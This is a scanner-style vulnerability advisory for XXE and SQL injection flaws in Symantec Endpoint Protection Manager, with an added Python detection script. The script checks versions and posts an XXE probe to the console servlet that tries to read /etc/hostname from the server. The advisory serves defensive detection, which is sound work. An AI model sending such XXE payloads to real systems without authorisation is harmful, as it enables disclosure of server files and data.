Symantec Endpoint Protection Manager XXE and SQL Injection Vulnerabilities

Summary
The host is installed with Symantec Endpoint Protection Manager and is prone to XML External Entity (XXE) and SQL injection vulnerabilities.
Impact
Successful exploitation will allow attackers to disclose potentially sensitive information, manipulate certain data, and cause a denial of service (DoS).
Impact Level: System/Application
Solution
Upgrade Symantec Endpoint Protection Manager to version 11.0.7405.1424 or 12.1.4023.4080 or later, and Symantec Protection Center Small Business Edition to version 12.1.4023.4080 or later. For updates refer to http://www.symantec.com
Insight
The flaw is due to improper handling of XML data in servlet/ConsoleServlet, which processes external entity references contained in attacker-supplied XML (XXE). The same product is also affected by a SQL injection vulnerability.
Affected
Symantec Endpoint Protection Manager (SEPM) 11.0 before 11.0.7405.1424 and 12.1 before 12.1.4023.4080, and Symantec Protection Center Small Business Edition 12.x before 12.1.4023.4080
Detection
Send specially crafted XML data including external entity references to servlet/ConsoleServlet on TCP port 9090 and check whether the server resolves them and, in turn, whether commands can be executed remotely.
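As an added example (not code from the original check or from Symantec), the script below implements the two pieces of the detection described above in Python: a version comparison against the affected ranges listed under Affected, and a probe that posts an XML document with an external entity reference to servlet/ConsoleServlet on port 9090 and looks for evidence that entities were expanded. The request format (a bare POST with the XML as the body, a root element named `request`, the canary string and the `/etc/hostname` path) is an assumption made for illustration; the real servlet's message schema is not given on this page, and the probe only tests entity expansion, not command execution.

```python
"""Version check and XXE probe for the SEPM / SPC SBE advisory above.
Added example, not part of the original vulnerability test."""
import http.client
from typing import Optional, Tuple

# Fixed versions taken from the Affected / Solution sections of the advisory.
FIXED = {
    "sepm": {(11, 0): (11, 0, 7405, 1424), (12, 1): (12, 1, 4023, 4080)},
    "spc_sbe": {(12,): (12, 1, 4023, 4080)},
}


def parse_version(s: str) -> Tuple[int, ...]:
    """'12.1.4023.4080' -> (12, 1, 4023, 4080). A shorter string such as '12.1'
    compares lower than any full build on that branch, so it is reported as
    vulnerable rather than silently ignored."""
    return tuple(int(p) for p in s.strip().split("."))


def is_vulnerable(product: str, version: str) -> bool:
    """True if the installed version is inside an affected range.
    product: 'sepm' (Endpoint Protection Manager) or 'spc_sbe'
    (Protection Center Small Business Edition)."""
    v = parse_version(version)
    branches = FIXED.get(product)
    if branches is None:
        raise ValueError(f"unknown product {product!r}")
    for prefix, fixed in branches.items():
        if v[:len(prefix)] == prefix:
            return v < fixed
    return False  # other branches are not listed as affected on this page


CANARY = "xxe-canary-7f3a"  # constructed marker; any unlikely string works


def build_probe(canary: str = CANARY, path: str = "/etc/hostname") -> bytes:
    """XML with one internal entity (the canary) and one external entity.
    The internal entity tells us whether the parser expands entities at all;
    the external SYSTEM entity is what an XXE-vulnerable parser would fetch.
    Root element name and field names are assumptions, not the real schema."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE request [\n"
        f'  <!ENTITY canary "{canary}">\n'
        f'  <!ENTITY xxe SYSTEM "file://{path}">\n'
        "]>\n"
        "<request><marker>&canary;</marker><data>&xxe;</data></request>\n"
    ).encode()


def response_indicates_xxe(body: str, canary: str = CANARY) -> bool:
    """Heuristic: the canary value came back expanded and the unexpanded
    reference '&canary;' did not. A server that merely echoes the raw request
    returns both, and is correctly reported as not expanding entities."""
    return canary in body and "&canary;" not in body


def probe(host: str, port: int = 9090, timeout: float = 5.0) -> Optional[str]:
    """POST the probe to servlet/ConsoleServlet and return the response body,
    or None on connection failure. Network call; not exercised offline."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("POST", "/servlet/ConsoleServlet", body=build_probe(),
                     headers={"Content-Type": "text/xml"})
        return conn.getresponse().read().decode("utf-8", "replace")
    except OSError:
        return None
    finally:
        conn.close()


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    body = probe(target)
    print("no response" if body is None else
          f"entity expansion: {response_indicates_xxe(body)}")
```

Run with the manager's address as the first argument; the version check is meant to be fed the build number obtained from the console banner or an authenticated inventory, and is the more reliable of the two signals because entity expansion is only the precondition for XXE, not proof of exploitability.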
References